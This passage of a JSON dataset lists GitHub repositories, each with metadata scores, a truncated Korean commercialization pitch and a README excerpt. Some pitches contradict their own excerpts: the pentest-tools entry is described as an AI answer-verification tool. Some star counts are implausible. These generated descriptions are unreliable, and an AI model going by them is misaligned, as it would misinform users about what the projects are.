and added lot of new functions on the basis of MySQL-Proxy 0.8.2. Currently the project has been widely applied in QIHU, many MySQL business has connected to the Atlas platform. The number of read and write requests forwarded by Atlas has reached billions.\n \n### 2.Major functions\n\n1.Read/Write Splitting.\n\n2.Load balancing and failover handling.\n\n3.IP filtering.\n\n4.Data sharding\n\n5.DBA can online or offline the backend database server smoothly.\n\n6.Remove the failed database server automatically.\n\n7.Config file reload without downtime.\n\n### 3.The improvement of Atlas compared with Mysql","composite_score":0.4457,"license_safety_tag":"restricted"},{"name":"EOSIO/eos","github_url":"https://github.com/EOSIO/eos","stars":16,"language":"C++","license":"mit","abandonment_months":47,"description":"# EOSIO/eos 프로젝트 분석\n\n## 왜 보물인가\n블록체인 기술 기반으로 전 세계 누구나 빠르고 안전하게 거래할 수 있는 시스템을 만들 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 암호화폐 거래소 플랫폼을 클라우드로 제공하여 중소 핀테크 기업들이 쉽게 시작하도록 지원\n- **내부 업무 도구**: 대기업의 공급망 추","readme_excerpt":"\n# EOSIO - The Most Powerful Infrastructure for Decentralized Applications\n\n[![Build status](https://badge.buildkite.com/370fe5c79410f7d695e4e34c500b4e86e3ac021c6b1f739e20.svg?branch=master)](https://buildkite.com/EOSIO/eosio)\n\nWelcome to the EOSIO source code repository! This software enables businesses to rapidly build and deploy high-performance and high-security blockchain-based applications.\n\nSome of the groundbreaking features of EOSIO include:\n\n1. Free Rate Limited Transactions\n1. Low Latency Block confirmation (0.5 seconds)\n1. Low-overhead Byzantine Fault Tolerant Finality\n1. Designed for optional high-overhead, low-latency BFT finality\n1. Smart contract platform powered by WebAssembly\n1. Designed for Sparse Header Light Client Validation\n1. Scheduled Recurring Transactions\n1. Time Delay Security\n1. Hierarchical Role Based Permissions\n1. Support for Biometric Hardware Secured Keys (e.g. Apple Secure Enclave)\n1. Designed for Parallel Execution of Context Free Validation Logic\n1.","composite_score":0.4455,"license_safety_tag":"safe"},{"name":"JDHelloWorld/jd_scripts","github_url":"https://github.com/JDHelloWorld/jd_scripts","stars":18,"language":"JavaScript","license":"MIT","abandonment_months":20,"description":"# JDHelloWorld/jd_scripts 분석\n\n## 왜 보물인가\n온라인 쇼핑몰 자동화 작업을 직접 코딩 없이 운영할 수 있는 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 이커머스 판매자를 위한 \"자동 주문 관리·재고 동기화 클라우드 서비스\" 구독형 플랫폼\n2. **내부 업무 도구**: 온라인 쇼핑몰 운영업","readme_excerpt":"# About\nA NodeJS project\n\n# Languages\nTypeScript & JavaScript\n\n# Environment\nWindows, Linux, MacOS\n\nNodeJS https://nodejs.org\n```shell\nnpm install -g cnpm\n```\n\n# Usage\n```shell\ncd enen\ncnpm install\nnode filename.js\nts-node filename.ts\n```","composite_score":0.4453,"license_safety_tag":"safe"},{"name":"ML-KULeuven/deepproblog","github_url":"https://github.com/ML-KULeuven/deepproblog","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# DeepProbLog 상용화 분석\n\n## 왜 보물인가\n인공지능이 논리적 추론을 하도록 학습시킬 수 있는 기술로, 의료 진단, 법률 판단 같은 '설명 가능한 AI'가 필요한 분야에서 수십억 원대 시장을 형성하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료진단 SaaS**: 의료기관에 구독형으로 제공하는 AI 보조진단 플랫폼 (월 500만원~2000","readme_excerpt":"# DeepProbLog\n[![Unit tests](https://github.com/ML-KULeuven/deepproblog/actions/workflows/python-app.yml/badge.svg)](https://github.com/ML-KULeuven/deepproblog/actions/workflows/python-app.yml)\n\nDeepProbLog is an extension of [ProbLog](https://dtai.cs.kuleuven.be/problog/)\nthat integrates Probabilistic Logic Programming with deep learning by introducing the neural predicate. \nThe neural predicate represents probabilistic facts whose probabilites are parameterized by neural networks.\nFor more information, consult the papers listed below.\n\n## Installation\nDeepProbLog can easily be installed using the following command:\nMake sure the following packages are installed:\n```\npip install deepproblog\n```\n\n## Test\nTo make sure your installation works, install pytest \n```\npip install pytest\n````\nand run \n```\npython -m deepproblog test\n```\n\n## Requirements\n\nDeepProbLog has the following requirements:\n* Python > 3.9\n* [ProbLog](https://dtai.cs.kuleuven.be/problog/)\n* [PySDD](https://pysdd.readthedo","composite_score":0.4449,"license_safety_tag":"safe"},{"name":"osmr/imgclsmob","github_url":"https://github.com/osmr/imgclsmob","stars":5,"language":"Python","license":"MIT","abandonment_months":21,"description":"# imgclsmob 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지를 자동으로 분류해주는 AI 기술 모음으로, 누구나 쉽게 가져다 쓸 수 있는 완성된 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 사진 정리 서비스에서 사용자가 업로드한 수천 장의 사진을 자동으로 '풍경', '사람', '음식' 등으로 분류해주는 기능\n2.","readme_excerpt":"# Deep learning networks\n\n[![Build Status](https://travis-ci.org/osmr/imgclsmob.svg?branch=master)](https://travis-ci.org/osmr/imgclsmob)\n[![GitHub License](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n[![Python Version](https://img.shields.io/badge/python-3.10-lightgrey.svg)](https://github.com/osmr/imgclsmob)\n\nThis repo is used to research convolutional networks primarily for computer vision tasks. For this purpose, the repo\ncontains (re)implementations of various classification, segmentation, detection, and pose estimation models and scripts\nfor training/evaluating/converting.\n\nThe following frameworks are used:\n- MXNet/Gluon ([info](https://mxnet.apache.org)),\n- PyTorch ([info](https://pytorch.org)),\n- Chainer ([info](https://chainer.org)),\n- Keras ([info](https://keras.io)),\n- TensorFlow 1.x/2.x ([info](https://www.tensorflow.org)).\n\nFor each supported framework, there is a PIP-package containing pure models without auxiliary scripts. Li","composite_score":0.4449,"license_safety_tag":"safe"},{"name":"olson-sean-k/decorum","github_url":"https://github.com/olson-sean-k/decorum","stars":5,"language":"Rust","license":"MIT","abandonment_months":18,"description":"# Decorum 저장소 분석\n\n## 왜 보물인가\n숫자 계산을 정확하게 처리해야 하는 금융, 회계, 과학 분야에서 신뢰할 수 있는 기초 도구로 사용할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **재무 관리 SaaS**: 개인/기업의 수입지출을 정확히 계산하는 앱으로 월간 구독료 모델 운영\n2. **회계 소프트웨어**: 중소 기업의 세무 신","readme_excerpt":"<div align=\"center\">\n    <img alt=\"Decorum\" src=\"https://raw.githubusercontent.com/olson-sean-k/decorum/master/doc/decorum.svg?sanitize=true\" width=\"320\"/>\n</div>\n<br/>\n\n**Decorum** is a Rust library that provides total ordering, equivalence,\nhashing, constraints, error handling, and more for IEEE 754 floating-point\nrepresentations. Decorum does **not** require the `std` nor `alloc` libraries,\nthough they are necessary for some features.\n\n[![GitHub](https://img.shields.io/badge/GitHub-olson--sean--k/decorum-8da0cb?logo=github&style=for-the-badge)](https://github.com/olson-sean-k/decorum)\n[![docs.rs](https://img.shields.io/badge/docs.rs-decorum-66c2a5?logo=rust&style=for-the-badge)](https://docs.rs/decorum)\n[![crates.io](https://img.shields.io/crates/v/decorum.svg?logo=rust&style=for-the-badge)](https://crates.io/crates/decorum)\n\n## Basic Usage\n\nPanic when a `NaN` is encountered:\n\n```rust\nuse decorum::NotNan;\n\nlet x = NotNan::<f64>::assert(0.0);\nlet y = NotNan::<f64>::assert(0.0);\nlet z","composite_score":0.4446,"license_safety_tag":"safe"},{"name":"showmewebcam/showmewebcam","github_url":"https://github.com/showmewebcam/showmewebcam","stars":30,"language":"Shell","license":"GPL-3.0","abandonment_months":22,"description":"# showmewebcam 분석 보고서\n\n## 왜 보물인가\n일반인도 쉽게 웹캠을 원격으로 제어하고 모니터링할 수 있는 간단한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **원격 모니터링 SaaS**: 건설 현장, 매장, 가정의 보안 카메라를 언제 어디서나 확인하는 구독 서비스\n2. **기업 내부 도구**: 제조업 공장의 여러 생산라인을 사무실에서 실시간","readme_excerpt":"# Show-me webcam: An open source, trustable and high quality webcam\n\n[![Build/Release](https://github.com/showmewebcam/showmewebcam/workflows/Build/Release/badge.svg)](https://github.com/showmewebcam/showmewebcam/actions)\n[![License](https://img.shields.io/github/license/showmewebcam/showmewebcam?label=License)](https://github.com/showmewebcam/showmewebcam/blob/master/LICENSE)\n[![Last Release](https://img.shields.io/github/release/showmewebcam/showmewebcam.svg?label=Last%20Release)](https://github.com/showmewebcam/showmewebcam/releases/)\n[![Total Downloads](https://img.shields.io/github/downloads/showmewebcam/showmewebcam/total.svg?label=Total%20Downloads)](https://github.com/showmewebcam/showmewebcam/releases/)\n[![Discord Chat](https://img.shields.io/discord/774949618832113674.svg?label=Discord%20Chat)](https://discord.gg/dTc4jtf3YX)\n\nThis firmware transforms your Raspberry Pi into a high quality webcam. It works reliably, boots quickly, and gets out of your way.\n\n### [Wiki & Document","composite_score":0.4444,"license_safety_tag":"restricted"},{"name":"stuntrally/stuntrally","github_url":"https://github.com/stuntrally/stuntrally","stars":5,"language":"C++","license":"gpl-3.0","abandonment_months":22,"description":"# Stunt Rally 상용화 분석\n\n## 왜 보물인가\n누구나 즐길 수 있는 레이싱 게임 엔진이 완전히 무료로 공개되어 있어서, 이를 기반으로 새로운 게임이나 시뮬레이션 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 SaaS**: 브라우저 기반 멀티플레이 레이싱 게임 플랫폼으로 월 구독료를 받으며 운영\n2. **운전 교육 도구**:","readme_excerpt":"![](/data/hud/stuntrally-logo.jpg)\r\n\r\n[![Build game](https://github.com/stuntrally/stuntrally/workflows/Build%20game/badge.svg)](https://github.com/stuntrally/stuntrally/actions?query=workflow%3A%22Build+game%22)\r\n![last commit](https://flat.badgen.net/github/last-commit/stuntrally/stuntrally)\r\n![last tag](https://flat.badgen.net/github/tag/stuntrally/stuntrally)\r\n![license](https://flat.badgen.net/github/license/stuntrally/stuntrally)\r\n\r\n## Links\r\n\r\n[Stunt Rally Homepage](https://stuntrally.tuxfamily.org/) - Download links, track & vehicle browsers etc.  \r\nSources: [New 3.x](https://github.com/stuntrally/stuntrally3), [Old 2.x](https://github.com/stuntrally/stuntrally/) - with Documentation in docs/, also for bugs & Issues, pull requests, etc  \r\n[Forums](https://forum.freegamedev.net/viewforum.php?f=77) - Discussions, tracks, Issues, etc.  \r\n[Screenshots](https://stuntrally.tuxfamily.org/gallery) - Galleries from all versions and development  \r\n[Videos](https://www.youtube.com/user/Th","composite_score":0.4443,"license_safety_tag":"restricted"},{"name":"antonreshetov/image-optimizer","github_url":"https://github.com/antonreshetov/image-optimizer","stars":23,"language":"TypeScript","license":"MIT","abandonment_months":22,"description":"# image-optimizer 상용화 분석\n\n## 왜 보물인가\n스마트폰이나 카메라로 찍은 사진을 자동으로 압축해서 용량을 줄여주는 도구로, 웹사이트 속도를 개선하거나 저장 공간을 절약하려는 모든 사람에게 필요합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 웹서비스**\n사용자가 웹브라우저에서 사진을 업로드하면 자동으로 최적화해주는 온라인 도구(Tin","readme_excerpt":"\n<p align=\"center\">\n  <img src=\"logo.png\" width=\"150px\">\n</p>\n<h1 align=\"center\">Image Optimizer</h1>\n<p align=\"center\">\n  <img alt=\"GitHub package.json version\" src=\"https://img.shields.io/github/package-json/v/antonreshetov/image-optimizer\">\n  <img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/antonreshetov/image-optimizer/total\">\n  <img alt=\"GitHub\" src=\"https://img.shields.io/github/license/antonreshetov/image-optimizer\">\n</p>\n<p align=\"center\">\n  <strong>Built with Electron, Vue & Vite.</strong>\n</p>\n\nA free and open source tool for optimizing images and vector graphics.\n\n<p align=\"center\">\n  <img src=\"demo.gif\">\n</p>\n\n\n## Core libs\n - [mozjpeg](https://github.com/mozilla/mozjpeg)\n - [pngquant](https://pngquant.org)\n - [cwebp](https://developers.google.com/speed/webp/docs/cwebp)\n - [gifsicle](https://www.lcdf.org/gifsicle/)\n - [SVGO](https://github.com/svg/svgo)\n\n## Download and Installation on macOS\n\nGo to [Releases](https://github.com/antonreshetov/image","composite_score":0.4434,"license_safety_tag":"safe"},{"name":"Jannchie/Historical-ranking-data-visualization-based-on-d3.js","github_url":"https://github.com/Jannchie/Historical-ranking-data-visualization-based-on-d3.js","stars":5,"language":"JavaScript","license":"GPL-3.0","abandonment_months":69,"description":"# Historical-ranking-data-visualization-based-on-d3.js 분석\n\n## 왜 보물인가\n시간에 따라 변하는 순위 데이터를 동적으로 보여주는 애니메이션 차트를 만들 수 있어서, 복잡한 통계를 누구나 이해하기 쉬운 영상으로 표현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업들이 자사의 시장 점유","readme_excerpt":"# 该项目暂停维护\n\n这个项目存在很多历史遗留问题，使用起来也不是非常便利。因此我开了一个新坑，旨在能够更好地制作此类数据可视化视频。\n\n新项目地址：\n\n[anichart.js](https://github.com/Jannchie/anichart.js): https://github.com/Jannchie/anichart.js\n\n个人精力有限，此项目基本上不会更新代码了。此项目的代码仍能使用，如果出现问题，也可以发邮件到jannchie@gmail.com，我会予以修复。\n\n---\n\n<h1 align=\"center\">\n动态排名数据可视化\n</h1>\n\n<h3 align=\"center\">将历史数据排名转化为动态柱状图图表</h3>\n\n<p align=\"center\">\n  <a href=\"readme-en.md\">English</a>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://github.com/Jannchie/Historical-ranking-data-visualization-based-on-d3.js/issues\" style=\"text-decoration:none\">\n        <img src=\"https://img.shields.io/github/issues/Jannchie/Historical-ranking-data-visualization-based-on-d3.js.svg\" alt=\"GitHub issues\"/>\n    </a>\n    <a href=\"https://github.com/Jannchie/Historical-ranking-data-visualization-based-on-d3.js/stargazers\" style=\"text-decoration:none\" >\n        <img src=\"https://img.shields.io/github/stars/Jannchie/Historical-ranking-data-visualization-based-on-d3.js.svg\" alt=\"GitHub stars\"/>\n    </a>\n    <a href=\"","composite_score":0.4434,"license_safety_tag":"restricted"},{"name":"gwen001/pentest-tools","github_url":"https://github.com/gwen001/pentest-tools","stars":5,"language":"Python","license":"unknown","abandonment_months":37,"description":"# gwen001/pentest-tools 평가 보고서\n\n## 왜 보물인가\n인공지능이 제공하는 답변이 정말 맞는지 검증하는 기술로, AI 서비스의 신뢰도를 높이는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 챗봇 SaaS**: 고객에게 제공하는 챗봇의 답변이 정확한지 자동으로 검사하는 기능 추가\n2. **기업 내부 업무 도구**: 회사의 의사","readme_excerpt":"<h1 align=\"center\">pentest-tools</h1>\n\n<h4 align=\"center\">A collection of custom security tools for quick needs.</h4>\n\n<p align=\"center\">\n    <img src=\"https://img.shields.io/badge/-bash-gray\" alt=\"bash badge\">\n    <img src=\"https://img.shields.io/badge/python-v3-blue\" alt=\"python badge\">\n    <img src=\"https://img.shields.io/badge/php-%3E=5.5-blue\" alt=\"php badge\">\n    <img src=\"https://img.shields.io/badge/license-MIT-green\" alt=\"MIT license badge\">\n    <a href=\"https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f\" target=\"_blank\"><img src=\"https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools\" alt=\"twitter badge\"></a>\n</p>\n\n<!-- <p align=\"center\">\n    <img src=\"https://img.shields.io/github/stars/gwen001/pentest-tools?style=social\" alt=\"github stars badge\">\n    <img src=\"https://img.shields.io/github/watchers/gwen001/pentest-tools?style=social\" alt=\"github watchers badge\">\n    <img src=\"https://im","composite_score":0.4432,"license_safety_tag":"unknown"},{"name":"fossasia/susi_server","github_url":"https://github.com/fossasia/susi_server","stars":10,"language":"Java","license":"LGPL-2.1","abandonment_months":58,"description":"# SUSI Server 상업화 분석\n\n## 왜 보물인가\n누구나 질문에 답해주는 AI 어시스턴트를 직접 만들고 관리할 수 있는 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들을 위한 맞춤형 챗봇 빌더 웹사이트 운영 (고객이 자신의 AI 어시스턴트를 클라우드에서 직접 만들고 관리)\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"##################\nSUSI.AI Server\n##################\n\n|Join the chat at https://gitter.im/fossasia/susi_server| |Docker Pulls| |Build\nStatus| |Percentage of issues still open| |Average time\nto resolve an issue| |Twitter| |Twitter Follow|\n\nSUSI.AI is an intelligent Open Source personal assistant. It is capable of chat and voice interaction by using APIs to perform actions such as music playback, making to-do lists, setting alarms, streaming podcasts, playing audiobooks, and providing weather, traffic, and other real-time information. Additional functionalities can be added as console services using external APIs. SUSI.AI is able to answer questions and depending on the context will ask for additional information in order to perform the desired outcome. The core of the assistant is the SUSI.AI server that holds the \"intelligence\" and \"personality\" of SUSI.AI. The Android and web applications make use of the APIs to access information from a hosted server.\n\n**Deployments**\n\n*Development*:","composite_score":0.443,"license_safety_tag":"restricted"},{"name":"DeweyReed/ChromeMenu","github_url":"https://github.com/DeweyReed/ChromeMenu","stars":8,"language":"Java","license":"BSD-3-Clause","abandonment_months":20,"description":"# ChromeMenu 상품화 분석\n\n## 왜 보물인가\n구글 크롬 브라우저의 우측 메뉴(컨텍스트 메뉴)를 자유롭게 커스터마이징할 수 있는 도구로, 반복적인 작업을 단축키 하나로 처리하게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 웹 기반 작업 자동화 플랫폼**\n- 기업 직원들의 일상적인 브라우저 작업(복사, 검색, 변환)을 한 번의 ","readme_excerpt":"# ChromeMenu\n\n[![Download](https://jitpack.io/v/DeweyReed/ChromeMenu.svg)](https://jitpack.io/#DeweyReed/ChromeMenu)\n[![API](https://img.shields.io/badge/API-17%2B-blue.svg?style=flat)](https://android-arsenal.com/api?level=17)\n\nThe menu from [Chromium Android appmenu](https://chromium.googlesource.com/chromium/src/+/refs/heads/master/chrome/browser/ui/android/appmenu/internal/java/src/org/chromium/chrome/browser/ui/appmenu)([Github Mirror](https://github.com/chromium/chromium/tree/master/chrome/browser/ui/android/appmenu/internal/java/src/org/chromium/chrome/browser/ui/appmenu)). It can do this:\n\n![Example GIF](https://github.com/DeweyReed/ChromeMenu/blob/master/images/example.gif?raw=true)\n\nNotice **the press, move, selection, up are finished in one gesture**.\n\nI love this design. It significantly improves the efficiency of using an app. So I dig into chromium, extract related code and pack them into this library.\n\n**Update**: Recently, I found that [getDragToOpenListener](https://de","composite_score":0.4428,"license_safety_tag":"safe"},{"name":"RimoChan/Vtuber_Tutorial","github_url":"https://github.com/RimoChan/Vtuber_Tutorial","stars":10,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"# Vtuber_Tutorial 상용화 분석\n\n## 왜 보물인가\n유튜브 크리에이터나 스트리머들이 쉽게 따라 할 수 있는 버추얼 튜토리얼 콘텐츠로, 성장하는 1인 창작자 시장의 니즈를 정확히 충족시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신인 크리에이터를 위한 \"버추얼 아바타 설정 자동화 플랫폼\" - 월 구독으로 한 번의 클릭으로 캐","readme_excerpt":"# 从零开始的自制Vtuber: 1.面部捕捉初级\n\n这是一个自制Vtuber的教程，这个教程包含从面部捕捉到图形渲染的一条龙服务。\n\n这个教程是迭代式的，因此每当你看完一节时都可以做出一个Vtuber，它会随着你的学习而越发强大。\n\n也许你能从中学到很多知识，但请不要跟着这个教程做，因为我有一些操作过于神奇以至于成了反面教材。\n\n在第一节里，我们将会简单地体验一下面部捕捉技术，然后用一些数学计算追踪头部的角度，最后用一个简单的角色来展示今天的成果。\n\n## 目录\n\n1. 面部捕捉初级 (就是这个文件所以没有链接)\n2. [画图和绘图](2.md)\n3. [进入虚空](3.md) (从这里开始命名开始放飞自我了)\n4. [合成进化](4.md)\n5. [一时休战](5.md) \n6. [与神之假身的接触](6.md) (现在还是草稿)\n7. [还没写！](7.md) (你以为有链接所以这真是个章节但实际上不是)\n8. [真的还没写！](8.md) (没想到还没写居然会多出一个吧！)\n\n## 警告\n\n这个章节还没有完成校订，因此可能有和谐内容。\n\n请您收好鸡儿，文明观球。\n\n## 准备\n\n在这个章节，你需要准备: \n\n+ 电脑\n+ 摄像头\n+ 基本的图形图像概念\n+ 高中的计算几何知识\n+ Python3\n+ Dlib\n+ OpenCV\n+ NumPy \n\n明明是从零开始却用了好多库！\n\n事情是这样的，根据皮亚诺公理，凡是你认为是0的东西就是0。\n\n## 读取视频流\n\n首先我们使用OpenCV从摄像头读取视频流，并尝试着把它播放在窗口上。\n\n```python\ncap = cv2.VideoCapture(0)\nwhile True:\n    ret, img = cap.read()\n    img = cv2.flip(img, 1)\n    cv2.imshow('self', img)\n    cv2.waitKey(1)\n```\n\n> OpenCV 4.4.0.40 会出现 [Segment fault when call imshow](https://github.com/opencv/opencv/issues/18079) 的错误，最好使用其他版本。\n\n`cv2.VideoCapture(0)`表示默认摄像头，如果用外置摄像头可能得把它改成1。\n\n`","composite_score":0.4426,"license_safety_tag":"unknown"},{"name":"Microsoft/LightGBM","github_url":"https://github.com/Microsoft/LightGBM","stars":7,"language":"C++","license":"MIT","abandonment_months":0,"description":"# LightGBM 사업화 분석\n\n## 왜 보물인가\n대량의 데이터를 빠르게 분석해서 패턴을 찾아내는 AI 엔진으로, 은행·보험·전자상거래 등 빅데이터를 다루는 회사들이 필수적으로 찾는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 신용도 판정 플랫폼**\n은행이나 핀테크 업체가 대출 신청자의 신용도를 자동으로 판정하는 웹 서비스로 ","readme_excerpt":"<img src=https://github.com/lightgbm-org/LightGBM/blob/master/docs/logo/LightGBM_logo_black_text.svg width=300 />\n\n> [!NOTE]\n> This project moved from `Microsoft/LightGBM` to `lightgbm-org/LightGBM` in March 2026.\n> This repository is still the official LightGBM source code, managed by the same maintainers (including the creator of LightGBM).\n> For details, see https://github.com/lightgbm-org/LightGBM/issues/7187\n\nLight Gradient Boosting Machine\n===============================\n\n[![C++ GitHub Actions Build Status](https://github.com/lightgbm-org/LightGBM/actions/workflows/cpp.yml/badge.svg?branch=master)](https://github.com/lightgbm-org/LightGBM/actions/workflows/cpp.yml)\n[![Python-package GitHub Actions Build Status](https://github.com/lightgbm-org/LightGBM/actions/workflows/python_package.yml/badge.svg?branch=master)](https://github.com/lightgbm-org/LightGBM/actions/workflows/python_package.yml)\n[![R-package GitHub Actions Build Status](https://github.com/lightgbm-org/LightGBM/actions","composite_score":0.4422,"license_safety_tag":"safe"},{"name":"pytorch/live","github_url":"https://github.com/pytorch/live","stars":5,"language":"MDX","license":"MIT","abandonment_months":22,"description":"# PyTorch Live 저장소 분석\n\n## 왜 보물인가\n스마트폰 카메라로 인공지능 기반 실시간 영상 분석을 할 수 있는 기술로, 개발자들이 복잡한 과정 없이 쉽게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 건설 현장 안전 감시 플랫폼 (작업자 보호구 착용 여부 자동 감지)\n- **내부 업무 도구**: 소매점의 재고 자동","readme_excerpt":"<h1>This project has been archived and is no longer actively maintained.</h1>\n\n<h1>\n  <a href=\"https://playtorch.dev/\">\n    <img src=\"./website/static/img/PlayTorch_Logo_P.svg\" />\n  </a>\n</h1>\n\n<h3>\n  Build your AI powered mobile prototypes in minutes:\n  <a href=\"https://playtorch.dev/docs/next/tutorials/get-started/\">Get Started</a>\n  <span> · </span>\n  <a href=\"https://playtorch.dev/docs/tutorials/snacks/image-classification/\">Tutorials</a>\n  <span> · </span>\n  <a href=\"https://playtorch.dev/docs/next/api/core/\">API</a>\n</h3>\n\n<p>&nbsp;</p>\n\n<p>\n  <a href=\"https://www.npmjs.org/package/react-native-pytorch-core\">\n    <img src=\"https://img.shields.io/npm/v/react-native-pytorch-core?label=react-native-pytorch-core\" alt=\"Current React Native PyTorch Core npm package version.\" />\n  </a>\n</p>\n\n<p>\n  <a href=\"https://github.com/pytorch/live/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"PlayTorch is released under the MIT license.\" />\n  </a>\n</p>\n","composite_score":0.4418,"license_safety_tag":"safe"},{"name":"papermoonio/moonbeam-uniswap","github_url":"https://github.com/papermoonio/moonbeam-uniswap","stars":72,"language":"TypeScript","license":"GPL-3.0","abandonment_months":27,"description":"","readme_excerpt":"","composite_score":0.4418,"license_safety_tag":"restricted"},{"name":"iissnan/hexo-theme-next","github_url":"https://github.com/iissnan/hexo-theme-next","stars":11,"language":"JavaScript","license":"mit","abandonment_months":43,"description":"# hexo-theme-next 상용화 분석\n\n## 왜 보물인가\n블로그나 웹사이트를 쉽게 만들 수 있는 디자인 템플릿으로, 코딩 없이도 전문적인 외모의 웹사이트를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 블로그 빌더 플랫폼에서 기본 테마로 제공하여 사용자가 즉시 멋진 블로그를 시작하도록 유도\n2. **내부 업무 도구*","readme_excerpt":"<h1 align=\"center\">This repository is no longer maintained! :warning:</h1>\n<h2 align=\"center\">The community-maintained version is here: <a href=\"https://github.com/theme-next/hexo-theme-next\">NexT v6 and v7 :triangular_flag_on_post:</a></h2>\n\n<h1 align=\"center\">NexT</h1>\n\n<p align=\"center\">NexT is a high quality elegant <a href=\"http://hexo.io\">Hexo</a> theme. It is crafted from scratch, with love.</p>\n\n[![gitter-image]][gitter-url]\n[![mnt-image]](https://github.com/theme-next/hexo-theme-next)\n[![travis-image]][travis-url]\n[![rel-image]][releases-url]\n[![hexo-image]][hexo-url]\n[![lic-image]](LICENSE)\n\n* [Chinese Documentation](README.cn.md)\n\n## Live Preview\n\n* :heart_decoration: Muse scheme: [LEAFERx](https://leaferx.online) | [XiaMo](https://notes.wanghao.work) | [OAwan](https://oawan.me)\n* :six_pointed_star: Mist scheme: [Jeff](https://blog.zzbd.org) | [uchuhimo](http://uchuhimo.me) | [xirong](http://www.ixirong.com)\n* :pisces: Pisces scheme: [Vi](http://notes.iissnan.com) | [Acris](","composite_score":0.4415,"license_safety_tag":"safe"},{"name":"alexellis/expressjs-k8s","github_url":"https://github.com/alexellis/expressjs-k8s","stars":21,"language":"JavaScript","license":"MIT","abandonment_months":20,"description":"","readme_excerpt":"# Express.js Docker example\n\nExample to show how to build a microservice with Node.js and Express.js with instructions for: Kubernetes with YAML, [OpenFaaS](https://github.com/openfaas/faas), Docker and running locally with `node`\n\n## Endpoints\n\n* `/` - serves a HTML page\n* `/links` - serves a JSON response of links\n* `/health` - serves a health endpoint giving 200 OK\n\n## Clone the repository\n\n```bash\ngit clone https://github.com/alexellis/expressjs-docker --depth=1 \\\n  && cd expressjs-docker\n```\n\n## Install via Helm\n\nFirst install [Helm](https://helm.sh) via `arkade get helm`, or the Helm installation instructions.\n\nFor the published chart use:\n\n```bash\nhelm repo add expressjs-k8s https://alexellis.github.io/expressjs-k8s/\n\nhelm repo update\n\nhelm upgrade --install expressjs-k8s expressjs-k8s/expressjs-k8s\n```\n\nOr install via the local version, after cloning the repository:\n\n```bash\nhelm upgrade --install expressjs-k8s ./chart/expressjs-k8s/\n```\n\n## Try it with plain Kubernetes YAML fi","composite_score":0.4415,"license_safety_tag":"safe"},{"name":"lwansbrough/react-native-camera","github_url":"https://github.com/lwansbrough/react-native-camera","stars":6,"language":"Java","license":"mit","abandonment_months":36,"description":"# react-native-camera 분석 보고서\n\n## 왜 보물인가\n스마트폰의 카메라 기능을 앱에 쉽게 연결해주는 도구로, 증강현실·QR코드 인식·화상통화 등 카메라가 필요한 모든 앱 개발을 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 화상 회의 플랫폼에서 사용자의 카메라 접근을 관리하고 최적화하는 기능","readme_excerpt":"\n# 🚧 🚧 🚧\n## react-native-camera is deprecated.\n\nDue to the lack of maintainers and increased code complexity, react-native-camera is now deprecated in favor of [react-native-vision-camera](https://github.com/mrousavy/react-native-vision-camera).\n\nVisionCamera offers new APIs, better performance, improved stability and more features.\nIt is actively maintained by [**@mrousavy**](https://github.com/mrousavy) and used in many production apps.\n\nYou can support the development of VisionCamera by [sponsoring **@mrousavy** on GitHub](https://github.com/sponsors/mrousavy).\n\n<br />\n<br />\n\n> You can find the old code of react-native-camera [here](https://github.com/react-native-camera/react-native-camera/tree/master).\n\n> See [this issue](https://github.com/react-native-community/react-native-camera/issues/3000) for more details.\n","composite_score":0.441,"license_safety_tag":"safe"},{"name":"iBase4J/iBase4J","github_url":"https://github.com/iBase4J/iBase4J","stars":7,"language":"JavaScript","license":"apache-2.0","abandonment_months":42,"description":"# iBase4J 상용화 분석\n\n## 왜 보물인가\n기업의 업무 시스템을 빠르게 만들 수 있도록 미리 만들어진 '레고 블록' 같은 도구 모음이라, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n중소 소프트웨어 회사들이 자신의 업무 관리 시스템이나 고객 관계 관리 도구를 빠르게 개발할 때 기초 틀로 사용할","readme_excerpt":"[![License](http://img.shields.io/:license-apache-blue.svg \"2.0\")](http://www.apache.org/licenses/LICENSE-2.0.html)\r\n[![JDK 1.8](https://img.shields.io/badge/JDK-1.8-green.svg \"JDK 